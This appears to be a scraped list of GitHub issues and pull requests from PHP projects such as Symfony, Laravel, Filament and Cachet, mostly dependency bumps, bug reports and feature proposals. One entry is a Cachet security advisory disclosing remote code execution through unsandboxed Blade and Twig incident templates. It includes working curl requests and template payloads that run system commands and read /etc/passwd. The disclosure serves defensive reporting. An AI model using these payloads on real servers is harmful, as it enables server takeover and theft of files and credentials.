Maybe it would be also good if the ResponseFormatFactoryInterface knows which platform is used so that it could return different schemas depending on the platform. Of course the ultimate solution would be to only define some kind of "Symfony" schema and the library converts this to the fitting schema format for each provider but this is maybe a difficult task in suche fast moving environment.

So in general what do you think about this idea, I could also provide a first draft PR.

See also. https://github.com/symfony/ai/issues/2119

View more
chriskapp

chriskapp

19th Jun 2026 @ 18:37

View more
12 comments
caduvieira

caduvieira

25th Dec 2024 @ 15:48

Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Deprecations? no
Issues Fix #816
License MIT
View more
1 comment
Kocal

Kocal

25th Jun 2026 @ 04:21

View more
pascalbaljet

pascalbaljet

4th Jun 2026 @ 08:17

Status: Needs Review Waiting Code Merge Messenger Feature
fabpot

fabpot

14th Jul 2026 @ 16:25

help wanted

Sulu CMS separates its assets into assets/admin and assets/website, this means when installing Encore within a Sulu CMS install you will have to change a bunch of paths: https://docs.sulu.io/en/latest/cookbook/webpack-encore.html

This isn't my main issue, I think this is acceptable for an initial setup. But I do think we can improve what happens when you composer require a symfony bundle that provides stimulus controllers.

In the Sulu + Encore setup, the controllers.json file lives in assets/website/controllers.json. But since this path is hardcoded here:

https://github.com/symfony/flex/blob/441f671b86a1b651e969dbc380bfee05e004780f/src/PackageJsonSynchronizer.php#L166-L170

The controllers.json is not updated automatically and there's no output telling you to manually do this either. So you're left a little lost in what is still missing. Also, figuring out what to manually add in controllers.json is quite tricky since most existing UX bundles don't document this manual setup.

Before I start hacking away at a PR, any suggestions how we can solve this properly? Or do we accept that this is not configurable and those who use custom paths just have to deal with it?

Thank you in advance.

View more
4 comments 👍 1
rskuipers

rskuipers

27th Dec 2022 @ 21:16

Closes #1096

Problem

When a recipe defines a value wrapped in single quotes - for example to store a JSON array:

{
  "dotenv": {
    "dev": {
      "ALLOWED_LANGUAGES": "'[\"en\",\"de\",\"es\"]'"
    }
  }
}

The configurator incorrectly wrapped the value in double quotes and escaped the inner double quotes, producing:

ALLOWED_LANGUAGES="'[\"en\",\"de\",\"es\"]'"

Instead of the expected single-quoted dotenv literal:

ALLOWED_LANGUAGES='["en","de","es"]'

The dotenv format treats single-quoted values as fully literal strings (no escape processing), which makes them the natural fit for JSON content.

Solution

Skip the double-quote wrapping when the value already starts and ends with a single quote. Any other value continues through the existing escaping path introduced in #200.

// Before
if (false !== strpbrk($value, " \t\n&!\"")) {
  $value = '"'.str_replace([...], [...], $value).'"';
}

// After
if (!str_starts_with($value, "'") && !str_ends_with($value, "'") && false !== strpbrk($value, "\t\n&!\"")) {
  $value = '"'.str_replace([...], [...], $value).'"';
}

Tests

Added a ALLOWED_LANGUAGES='["en","de","es"]' fixture to both EnvConfiguratorTest and DotenvConfiguratorTest to cover this case, alongside the existing assertions for values that require double-quote escaping.

View more
1 comment
DjLeChuck

DjLeChuck

25th Jun 2026 @ 08:20

Bumps codecov/codecov-action from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
1 comment
dependabot[bot]

dependabot[bot]

8th Jun 2026 @ 11:32

help wanted

Octane Version

2.6.1

Laravel Version

11.41.3

PHP Version

8.3

What server type are you using?

Roadrunner

Server Version

2024.3.2

Database Driver & Version

No response

Description

ok this is in the borderline to be a bug but i write it anyway.

i am deploying using deployer , i suppose will happen for any Zero Downtime Deployments.

/releases/99/
/releases/100/
/releases/101/ 

and then a symbolic link from the latest release to /current , all pretty standard.

the problem come when running artisan octane:start vendor/laravel/octane/src/Commands/StartRoadRunnerCommand.php

will set roadrunner server with '-o', 'server.command='.(new PhpExecutableFinder)->find().','.base_path(config('octane.roadrunner.command', 'vendor/bin/roadrunner-worker')),

where base_path(...) will resolve to /releases/101/ not to /current

so in next deployment e.g. (/releases/102/) , when we run artisan octane:reload it will still use old /releases/101/ source code (i checked and yes if i go back to /releases/101/ and make a change it will be present after artisan octane:reload).

the solution is very simple, in config/octane.php you just need to add:

    'roadrunner'=>[
        'command' => env('OCTANE_ROADRUNNER_WORKER_PATH', base_path('vendor/bin/roadrunner-worker')),
    ]

OCTANE_ROADRUNNER_WORKER_PATH=../../current

would be nice is this added to config/octane.php , and maybe don't use base_path

or even better a option to provide the path in octane:start

Steps To Reproduce

deploy a octane laravel app using deployer , octane:reload will not work as expected

View more
1 comment
inikoo

inikoo

13th Feb 2025 @ 14:32

When using Webpack Encore in a project with "type": "module" in package.json the resulting bundle file contains require calls which include the polyfills through @babel/preset-env. These should have been replaced by wepack with the file contents. This problem does not occur when using a simple plain webpack config.

Removing "type": "module" (and rewriting the config as commonjs) the issue is not present.

Reproduction repository: https://github.com/m10/encore-type-module Also see branch "commonjs" for a working version without type module: https://github.com/m10/encore-type-module/tree/commonjs and the branch "webpack" for a working version with type module but without encore, using a simple webpack config instead: https://github.com/m10/encore-type-module/tree/webpack

View more
8 comments
m10

m10

10th Sep 2024 @ 13:42

Follow-up for #42.

The initial fix in #43 was released as 2.4.3, but it was reverted in #44 and released as 2.4.4 because the approach was not correct.

Scenario to revisit:

namespace App\Models;

use My\LaravelSupport\CAS\CasUser;

class User extends CasUser
{
}
namespace My\LaravelSupport\CAS;

use Illuminate\Database\Eloquent\Model;

class CasUser extends Model
{
}

When discovering models with extending(Model::class), App\Models\User is not discovered if the intermediate package model is outside the discovery path.

@rubenvanassche, could you take another look at the right approach here?

References:

View more
freekmurze

freekmurze

15th Jun 2026 @ 07:15

Q A
Issues Companion to symfony/ux#3469
License MIT

Companion PR to symfony/ux#3469. Adds the Toolkit/Shadcn docs page for the dropdown-menu recipe.

Kept as draft until symfony/ux#3469 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:21

This pull request contains changes for upgrading to PHPUnit 12 automated by the PHPUnit 12 Shift.

Before merging, you need to:

  • Checkout the shift-176807 branch
  • Review all pull request comments for additional changes
  • Run composer update (if the scripts fail, try with --no-scripts)
  • Run your tests suite: vendor/bin/phpunit

If there were changes you feel could have been automated, please send your feedback to [email protected] to help improve Shift for everyone.

View more
2 comments
ash-jc-allen

ash-jc-allen

27th Jun 2026 @ 12:32

enhancement

Package

filament/tables

Package Version

v4, v5

Laravel Version

v11, v12

Livewire Version

v3, v4

PHP Version

PHP 8.3+

Problem description

Currently, there is a number of columns that support displaying a list of 1-n and n-n relationship: TextColumn::make('tags.name'), ImageColumn::make('colleagues.avatar')->circular()->stacked(), however, there is no "official" way to access other fields or the model itself.

Consider:

// suppose we have a TagModel with columns (name, color)
TextColumn::make('tags.name')
    ->badge()
    ->color( // 'tags.color') //here, $record will be the main table $record, $state will be `tag.name`, $rowLoop will be the row loop of the row itself, not the loop of tags

or

ImageColumn::make('colleagues.avatar')
    ->circular()
    ->stacked()
    ->tooltip(// 'colleagues.name')

Currently, some cases there are workaround, for example:

TextColumn::make('tags.name')
    ->badge()
    ->color(function ($record, $state){
        $tag = $record->tags->firstWhere('name', $state);

        return Color::hex($tag->color);
    })

but at the end of the day, it is still a workaround, it wouldnt work if there is a record with null name, or duplicate name (it doesnt make sense with tag name, but other models may)

Speaking of which, there is currently no workaround for the avatar example, since $user->avatar may be null, or 2 user can use the same img url.

Expected behavior

There should be a way to access the model itself, either directly, or through a $rowLoop-type variable.

function($relationshipRecord) {

}

or

function($model, $relationshipRowLoop) {
    $model->relationship[$relationshipRowLoop->index]
}

Steps to reproduce

  1. Make a new filament project
  2. Make a table
  3. Make a HasMany or BelongsToMany relation
  4. Try to access and customize individual relation model

Reproduction repository (issue will be closed if this is not valid)

https://github.com/filamentphp/demo

Relevant log output


View more
4 comments
khangln-amv

khangln-amv

29th Jan 2026 @ 09:16

If I use special characters (such as ):(,% in my mail password, I'm getting the following error:

sed: bad option in substitution expression

I've tried to escape the characters with \. Then the container starts successfully, but it seems that cachet is using the escaped version of the password ...

View more
maxnowack

maxnowack

14th Jun 2021 @ 10:39

Context

Recently PHP 8.5 support was added to the project (see merged PR: https://github.com/symfony/security-acl/pull/133).

While working with newer PHP versions, I tried to update the Doctrine dependencies to more recent versions.

Currently the package supports:

doctrine/dbal ^2.13.1|^3.1
doctrine/persistence ^1.3.3|^2|^3

However, when installing newer DBAL versions (especially recent DBAL 3 releases), the test suite fails due to deprecation notices emitted by Doctrine.

Problem

When running the test suite with newer Doctrine DBAL versions, PHPUnit reports deprecations and exits with code 1 in CI.

PHP 8.1 Doctrine\DBAL\Connection::setNestTransactionsWithSavepoints is deprecated and will be removed in 5.0

Example:

19x in MutableAclProviderTest::setUp

PHP 8.5

With newer DBAL versions the number of deprecations increases significantly:

Examples:

Doctrine\DBAL\Schema\Table::setPrimaryKey() is deprecated. Use Table::addPrimaryKeyConstraint() instead.

Doctrine\DBAL\Schema\AbstractAsset::getName is deprecated and will be removed in 5.0

Doctrine\DBAL\Connection::setNestTransactionsWithSavepoints is deprecated

These originate mainly from:

MutableAclProviderTest::setUp
AclProviderTest::setUp

Even though all tests pass functionally:

OK, but incomplete, skipped, or risky tests!
Tests: 168, Assertions: 461

the CI still fails due to the remaining direct deprecations.

Question

What would be the preferred approach to move forward with newer Doctrine versions?

Possible options could be:

  1. Update the test schema creation code to avoid deprecated DBAL APIs (for example, replacing setPrimaryKey() with addPrimaryKeyConstraint() where applicable).
  2. Avoid calling deprecated APIs like Connection::setNestTransactionsWithSavepoints() in the test setup.
  3. Suppress Doctrine deprecations in the test suite if supporting multiple DBAL versions is required.
  4. Add explicit support for DBAL 4 and update the schema code accordingly.

From what I have seen, I do not think full dual compatibility is realistically maintainable here.

For example, in Doctrine DBAL 3 a primary key could be created with:

$table->setPrimaryKey(['id']);

Whereas in DBAL 4 this now requires:

$table->addPrimaryKeyConstraint(new PrimaryKeyConstraint(...));

The PrimaryKeyConstraint class does not exist in DBAL 3, so this is not just a deprecation issue or a small internal refactor: it creates a real compatibility boundary in the codebase.

Because of that, my proposal would be to introduce a new major version that explicitly supports modern Doctrine versions, starting from:

  • doctrine/dbal ^4
  • doctrine/persistence ^4

while leaving the current release line in place for older Doctrine versions.

I'm happy to work on a PR once the preferred direction is clarified. (I have started with this: https://github.com/symfony/security-acl/pull/135)

View more
1 comment
ireneperezddc1

ireneperezddc1

13th Mar 2026 @ 11:02

dependencies

Bumps the actions group with 3 updates in the / directory: actions/checkout, stefanzweifel/git-auto-commit-action and shivammathur/setup-php.

Updates actions/checkout from 6.0.2 to 7.0.0

Updates stefanzweifel/git-auto-commit-action from 7.1.0 to 7.2.0

Updates shivammathur/setup-php from 2.37.1 to 2.37.2

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
View more
dependabot[bot]

dependabot[bot]

4th Jul 2026 @ 16:02

Bumps actions/checkout from 6 to 7.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
1 comment
dependabot[bot]

dependabot[bot]

22nd Jun 2026 @ 07:22

Hello again, sorry to annoy you about this but for me the metrics are still not working for me. I got 3 seperate Webpages and its not working for all of them

View more
taepp-do

taepp-do

23rd Feb 2026 @ 09:03

privately reported on 23 May 2026 but no responses received: https://github.com/cachethq/cachet/security/advisories/GHSA-q3xh-8qcr-jgw3

Summary

Any authenticated Cachet user (including non-admin accounts) can achieve remote code execution on the server by creating an incident template that uses the unsandboxed Blade or Twig rendering engine, then triggering its evaluation by creating an incident. The template content is passed directly to Blade::render() or an unsandboxed Twig\Environment, which executes arbitrary PHP or calls arbitrary PHP functions.

Details

Cachet supports two rendering engines for incident templates: Blade and Twig. Both are implemented without sandboxing.

src/Renderers/BladeRenderer.php:

class BladeRenderer implements Renderer {
    public function render(string $template, array $variables = []): string {
        return Blade::render($template, $variables, deleteCachedView: true);
    }
}

Blade::render() compiles and executes the template string as a Laravel Blade template, which supports arbitrary PHP execution via @php directives and {!! !!} raw output tags.

src/Renderers/TwigRenderer.php:

class TwigRenderer implements Renderer {
    public function render(string $template, array $variables = []): string {
        $env = new Environment(new ArrayLoader([]));
        $template = $env->createTemplate($template);
        return $template->render($variables);
    }
}

A standard Twig\Environment (not SandboxedEnvironment) allows calling PHP functions via Twig filters. The rendering is triggered in src/Actions/Incident/CreateIncident.php (lines 20-26 and 50-66):

public function handle(CreateIncidentRequestData $data): Incident
{
    if (isset($data->template)) {
        $template = IncidentTemplate::query()
            ->where('slug', $data->template)
            ->first();
        $data = $data->withMessage($this->parseTemplate($template, $data));
    }
    // ...
}

private function parseTemplate(IncidentTemplate $template, CreateIncidentRequestData $data): string
{
    $vars = array_merge($data->templateVars, [
        'incident' => ['name' => $data->name, 'status' => $data->status, ...],
    ]);
    return $template->render($vars);
}

The Filament admin panel (src/CachetDashboardServiceProvider.php) restricts access only with Filament\Http\Middleware\Authenticate -- any authenticated user may log in. Only the UserResource has an explicit canAccess(): bool { return auth()->user()->isAdmin(); } check. The IncidentTemplateResource and IncidentResource have no such restriction, so non-admin users can create and manage templates and incidents through the Filament dashboard.

Via the API, the IncidentTemplateController::store() and IncidentController::store() endpoints require the incident-templates.manage and incidents.manage token abilities respectively. API tokens created without specifying abilities default to ['*'] (wildcard), granting all abilities.

Affected files:

  • src/Renderers/BladeRenderer.php (root cause for Blade engine)
  • src/Renderers/TwigRenderer.php (root cause for Twig engine)
  • src/Actions/Incident/CreateIncident.php, lines 20-26, 50-66 (template render trigger)
  • src/Filament/Resources/IncidentTemplates/IncidentTemplateResource.php (missing access control)
  • src/Filament/Resources/Incidents/IncidentResource.php (missing access control)

PoC

Prerequisites: A running Cachet instance; credentials for any authenticated user (non-admin).

Via Filament dashboard (Blade engine):

  1. Log in to the Cachet dashboard as any authenticated user.
  2. Navigate to Incident Templates and create a new template:
    • Name: pwn
    • Slug: pwn
    • Engine: blade
    • Template content:
      @php system('id'); @endphp
      
  3. Navigate to Incidents and create a new incident:
    • Name: test
    • Template: pwn
  4. The server renders the template, executing system('id'). The command output appears in the incident message.

Via API (Blade engine):

# Obtain an API token for any authenticated user (via profile -> API Keys in the dashboard)
TOKEN="YOUR_TOKEN_HERE"
BASE="http://TARGET"

# Step 1: Create malicious template
curl -s -X POST "$BASE/api/v1/incident-templates" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"pwn","slug":"pwn","engine":"blade","template":"@php echo shell_exec(\"id\"); @endphp"}'

# Step 2: Create incident using the template -- triggers rendering and RCE
curl -s -X POST "$BASE/api/v1/incidents" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","status":1,"template":"pwn","visible":1,"notify":false,"stickied":false}'

Expected: the id command output is present in the incident message in the response JSON.

Twig engine PoC (file read):

Template content using the Twig source() function:

{{ source('/etc/passwd') }}

For command execution via Twig:

{{ ['id']|filter('system') }}

Impact

Any authenticated user -- including those with non-admin (is_admin = false) accounts -- can execute arbitrary operating system commands as the web server process. This gives the attacker full control over the Cachet server: arbitrary file read/write, credential exfiltration, lateral movement, and denial of service. Cachet is commonly used as a public-facing status page and may run in environments alongside other sensitive internal services.

Affected versions: commit d30447a

View more
1 comment
geo-chen

geo-chen

1st Jul 2026 @ 10:00

dependencies github_actions

Bumps actions/cache from 4 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 07:13

Hello!

Hello! Oftentimes I want to report an exception with some addition, local context and there's currently not a nice way to do it, what I'm after is an api like:

try {
    // something risky
} catch (Throwable $throwable) {
    report($throwable, [/** some context */]);
}

Thanks!

View more
3 comments
calebdw

calebdw

13th Jul 2026 @ 22:37

Bug Status: Needs Review

I have a select box with dynamic options. The available options are based on values from other fields in the form. So during a Live rerender, it can happen that the available options change. E.g. the querybuilder for my selectbox gets adjusted and I get a new array of options. So the previously selected option is suddenly not in the array anymore.

The browser can not select the previously chosen option so nothing is selected, which is correct. But the Live data does not detect this as a "change to empty" event. The value in the Live data remains the old unexisting option. And that is different from what we see. The select box looks de-selected. And if we just submit the form again without changing anything, the old value remains in the Live data. While I would assume null or empty string would be submitted in the select box

Only when I manually update the select box the value gets picked up correctly.

So I think we miss the event where the browser actually silently mutates/unsets the select box to null

I currently fixed this behaviour with a Stimulus controller on the ChoiceType

# assets/controllers/select_box_silent_change_controller.js

import { Controller } from '@hotwired/stimulus'

export default class extends Controller {
  connect() {
    // Tracks the last known value to detect silent clears during DOM diffing
    this.lastValue = this.element.value

    // Keep lastValue in sync on real user changes
    this.element.addEventListener('change', this.handleChange.bind(this))

    this.observer = new MutationObserver(() => {
      const currentValue = this.element.value

      /*
       * When a re-render replaces options, the browser silently clears the value
       * without firing a change event — dispatch it manually so LiveComponent syncs
       */
      if (currentValue !== this.lastValue) {
        this.lastValue = currentValue
        this.element.dispatchEvent(new Event('change', { bubbles: true }))
      }
    })

    // Watch for option list replacements after a LiveComponent re-render
    this.observer.observe(this.element, { childList: true })
  }

  disconnect() {
    this.observer?.disconnect()
    this.element.removeEventListener('change', this.handleChange)
  }

  handleChange() {
    // Prevent MutationObserver from firing a duplicate manual event
    this.lastValue = this.element.value
  }
}

And use it in the dynamic form field:

$builder->add('myField', ChoiceType::class, [
    'required' => false,
    'placeholder' => 'select',
    'choices' => $myOptions,
    'attr' => [
        'data-controller' => 'select-box-silent-change',
     ],
]);
View more
Jalliuz

Jalliuz

6th May 2026 @ 11:26

Bug help wanted

The friendly-errors-webpack-plugin has a built-in transformer/formatter for when a module is missing. To see the behavior, try (in any JavaScript file):

require('foo'); // foo is not a module that is installed

The error is:

This dependency was not found:

  • foo in ./app/Resources/assets/js/app.js To install it, you can run: npm install --save foo

The problem is the npm install part... which should be yarn add to avoid confusion with our users. There is an issue about this: https://github.com/geowarin/friendly-errors-webpack-plugin/issues/33

View more
2 comments
weaverryan

weaverryan

25th Jun 2017 @ 23:10

Discussed in https://github.com/ash-jc-allen/short-url/discussions/299

Originally posted by degj21 November 20, 2024 Hi there! Searching for a short URL generator I found this package and it works like a charm. However, I noticed the original dependency of hashids/hashids has been rebranded and upgraded to this one: https://github.com/sqids/sqids-php. Could it be possible to incorporate the rebranded package as a dependency, maintaining the compatibility with Hashids? Thanks in advance for your feedback!

View more
1 comment
degj21

degj21

20th Nov 2024 @ 22:01

enhancement pending changes

Solves: https://github.com/filamentphp/filament/discussions/5401

Description

Builder components with many items are slow to render because every block's schema is evaluated and sent to the browser on initial page load, regardless of whether the user ever opens those items.

This PR adds opt-in lazy loading to the Builder component. Calling ->lazy() makes the builder collapsible and starts every item collapsed. Each item renders only its header and a loading placeholder on first load. When the user expands an item, a Livewire call triggers loadItem, which renders the block's schema and injects it into the page.

Builder::make('content')
    ->blocks([/* ... */])
    ->lazy()

State is always kept in the parent Livewire data array, values survive collapse/expand cycles and page reloads. Validation still runs against unloaded items: if a required field is missing in a collapsed block, the item is automatically expanded and loaded on submit.

Per-block opt-out: Block::make(...)->lazy(false) on an individual block forces it to render eagerly even inside a lazy builder.

Unload on collapse: ->lazy(unloadOnCollapse: true) removes a block's schema from the DOM when the user collapses it again.

Visual changes

Instead of instantly opening the collapsed block, it will open with a loading state.

Functional changes

  • Code style has been fixed by running the composer cs command.
  • Changes have been tested to not break existing functionality.
  • Documentation is up-to-date.
View more
3 comments
KianAcquoy

KianAcquoy

15th May 2026 @ 13:43

Platform Feature Status: Needs Review
Q A
Bug fix? No
New feature? yes
Docs? yes
Issues Fix #2256
License MIT

Add a dedicated symfony/ai-bedrock-mantle-platform bridge for the AWS Bedrock Mantle endpoint, which exposes OpenAI-compatible APIs (Chat Completions and Responses) for models served through Bedrock. It shares no code with the SigV4/SDK-based Bedrock bridge (Nova/Claude/Llama), so it lives in its own package and reuses the Generic and OpenResponses bridges over the plain OpenAI wire protocol; the base URL is derived from the AWS region.

  • Factory: Chat Completions route (Generic completions client and converter)
  • Responses\Factory: Responses API route (OpenResponses wire protocol)
  • Two authentication modes, with the API key taking precedence: a Bedrock API key sent as a bearer token, and AWS SigV4 signing via the standard AWS credential chain when no key is provided
  • Dedicated ModelCatalogs registering the verified models for each route
  • Runnable examples under examples/bedrock/ for both auth modes
View more
aszenz

aszenz

1st Jul 2026 @ 15:12

Validator Status: Needs Review Waiting Code Merge

Document the security expression functions (is_granted(), is_authenticated(), is_fully_authenticated(), is_remember_me()) now available in the validator expression language when the Security component is present.

Added examples to the When and Expression constraint reference pages.

Reference: https://github.com/symfony/symfony/pull/63719

View more
mp3000mp

mp3000mp

22nd Mar 2026 @ 01:18

View more
2 comments 👍 5 ❤️ 2
Chris53897

Chris53897

31st Jul 2024 @ 08:20

Fix #1188 by capturing default values from promoted properties in ancestors constructors.

See that Github issue for more details of why this functionality is required.

While it is technically possible to override the value passed into the constructor e.g.

public function __construct(
    string $example = 'a different value to the parent default',
) {
    parent::__construct(example: $example);
}

This would quickly become very complicated to support as the constructor can execute arbitrary code and the parameters could have different names/orders etc.

I think it's a reasonable trade-off that we only consider the value at the time of promotion. This still allows the child to override the parent class default by promoting again (by adding public) e.g.

public function __construct(
    public string $example = 'a different value to the parent default',
) {
    parent::__construct(example: $example);
}
View more
bentleyo

bentleyo

28th May 2026 @ 03:39

Platform RFC
View more
aszenz

aszenz

30th Jun 2026 @ 05:21

View more
seb-jean

seb-jean

21st Dec 2025 @ 13:56

A bug was identified in the planned maintenance module. Two planned maintenance tasks were created for the servers after the scheduled maintenance was completed. As a result, all updates from the front end disappeared. This issue requires immediate resolution.

All planned maintenance progress must be shown on the front end for clients.

View more
3 comments 😕 1
arkhalid1986

arkhalid1986

7th Jan 2026 @ 07:24

Even though I have all the tracking properties set to true, nothing is recorded in the short_url_visits table?
Is there something more I should be doing to track visits?

View more
mikeerickson

mikeerickson

13th Jul 2026 @ 00:47

Fixes #561

When a handler is declared with enabled: false, its service is never registered. But if that handler is also listed as a member of a group / whatfailuregroup / fallbackgroup handler, the group still builds a Reference to the (now non-existent) service, leading to a container compile error:

The service "monolog.handler.grouped" has a dependency on a non-existent service "monolog.handler.streamed".

This collects the disabled handler names up-front (so members can be filtered regardless of declaration order) and skips disabled members when assembling group handlers — consistent with the "a disabled handler is absent" semantics already applied at the top level.

Scope is intentionally limited to the group handlers, where dropping a member is meaningful. Single-nested-handler wrappers (fingers_crossed, buffer, …) require their inner handler, so disabling it there is a different concern.

Added a unit test covering a group with one enabled and one disabled member.

View more
Amoifr

Amoifr

1st Jun 2026 @ 07:47

Query-heavy commands (e.g. thousands of bulk upsert()s) could accumulate multi-MB query spans in memory until the process hit memory_limit, since spans are retained for the whole trace and the existing ReportTrimmer only runs at send time. This adds a LargeAttributesTrimmingRecorder trait that, at record time, drops any string or array attribute exceeding a configurable byte budget (max_attribute_size_in_kb, default 32KB) using an allocation-free early-exit AttributeSizeLimiter, incrementing the OpenTelemetry droppedAttributesCount. Trimming is opt-in per recorder via shouldTrimAttributes() (off by default) and is enabled for QueryRecorder and GlowRecorder, covering both spans and span events. Scalars, bools, floats and enums are never touched, and 0 disables trimming. Downstream note: laravel-flare mirrors this trace-limits config and will need the same max_attribute_size_in_kb key added.

View more
rubenvanassche

rubenvanassche

6th Jul 2026 @ 15:02

When running make:entity command with --with-uuid or --with-ulid options AND providing the entity name as an argument, the options are silently ignored and the entity is generated with a default integer ID instead.

Steps to Reproduce:

php bin/console make:entity MyEntity --with-uuid

Expected Behavior:

Entity should be generated with UUID as the ID type.

Actual Behavior:

Entity is generated with integer ID type. The UUID/ULID options are completely ignored.

Root Cause:

In MakeEntity::interact() method (lines 110-112), there is an early return when the entity name is provided as an argument. This happens before the checkIsUsingUid($input) call on line 126, which means the $usesUuid and $usesUlid flags are never set.

Proposed Solution:

Move the checkIsUsingUid($input) call before the early return condition on line 110, so it's always executed regardless of whether the entity name is provided as an argument.

Impact:

This bug affects:

  • Non-interactive usage (CI/CD, automated tests, scripts)
  • Any scenario where entity name is provided as argument
  • Third-party bundles that extend make:entity

Environment:

  • Symfony MakerBundle: 1.x
  • Symfony: 7.4+
  • PHP: 8.1+
View more
tito10047

tito10047

15th Mar 2026 @ 13:04

I am continuously frustrated by the fact that Arrayable has such little precision.

Take for instance something like this:

/** @implements Arrayable<string, mixed> */
class ShopifyOrder implements Arrayable
{
    public function __construct(
        public ShopifyGid $orderId,
        public string $firstName,
        public string $lastName,
        public Money $price
    ) {
    }

    /**
     * @return array{
     *     order_id: string,
     *     first_name: string,
     *     last_name: string,
     *     price: array{amount: int, currency: string}
     *  }
     */
    #[Override]
    public function toArray(): array
    {
        return [
            'order_id' => $this->orderId->__toString(),
            'first_name' => $this->firstName,
            'last_name' => $this->lastName,
            'price' => [
                'amount' => $this->price->amount,
                'currency' => $this->price->currency,
            ],
        ];
    }
}

The iterable type of array<string, mixed> is basically useless, and I end up having to re-write the fuller shape in the implementation.

Why 14.x?

Because this will likely cause a lot of folks having to modify their userland code to encode the proper generics.

View more
cosmastech

cosmastech

14th Jul 2026 @ 17:22

I'm using webpack 5 for my project and in case anyone needs this. I was able to get a global instance of Flasher working using the following method.

webpack config:

module: {
        rules: [
            {
                test: require.resolve("toastr"),
                loader: "expose-loader",
                options: {
                    exposes: ["toastr"],
                },
            },
            {
                test: require.resolve("@flasher/flasher"),
                loader: "expose-loader",
                options: {
                    exposes: ["Flasher"],
                },
            }
        ]
}

in app.js:

import toastr from "toastr";

// toastr defaults
toastr.options.timeOut = 10000;
toastr.options.closeButton = true;
toastr.options.escapeHtml = true;
toastr.options.progressBar = true;
toastr.options.closeOnHover = false;

import { default as Flasher } from "@flasher/flasher";
import { default as ToastrFactory } from "@flasher/flasher-toastr";
Flasher.getInstance().addFactory("toastr", new ToastrFactory());
View more
1 comment ❤️ 1
jamesj2

jamesj2

28th Jan 2022 @ 18:19

The main TYPO3 CMS repo is nw at https://github.com/TYPO3/typo3

We support GitHub URL redirection, but we're seeing some issues caused by this, so let's update the URL to avoid that redirection.

View more
javiereguiluz

javiereguiluz

10th Jul 2026 @ 06:33

When you add an update to an incident it doesn't update the incident's status. This fixes that #219

View more
1 comment
icecoldPHP

icecoldPHP

8th Mar 2025 @ 00:58

Q A
Issues Companion to symfony/ux#3483
License MIT

Companion PR to symfony/ux#3467. Adds the Toolkit/Shadcn docs page for the input-otp recipe.

Kept as draft until symfony/ux#3467 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
2 comments
Amoifr

Amoifr

18th Apr 2026 @ 14:20

I have a Symfony app (7.1). For e2e tests I use phpunit + symfony/panther + Chrome for Testing headless (on Debian Linux bullseye).

Since Chrome 128 has been released, my CI fails as the --window-size chrome argument is ignored.

I wrote a reproducer here : https://github.com/yblatti/repro-panther-screen-size-chrome

It seems to indicates that this has been introduced with Chrome 128.0.6575.0.

I have tried to have a look at https://chromium.googlesource.com/chromium/src/+log/128.0.6542.0..128.0.6543.0?pretty=fuller&n=10000 ... but this way out of my league.

View more
7 comments 👍 2
yblatti

yblatti

27th Aug 2024 @ 21:00

Summary

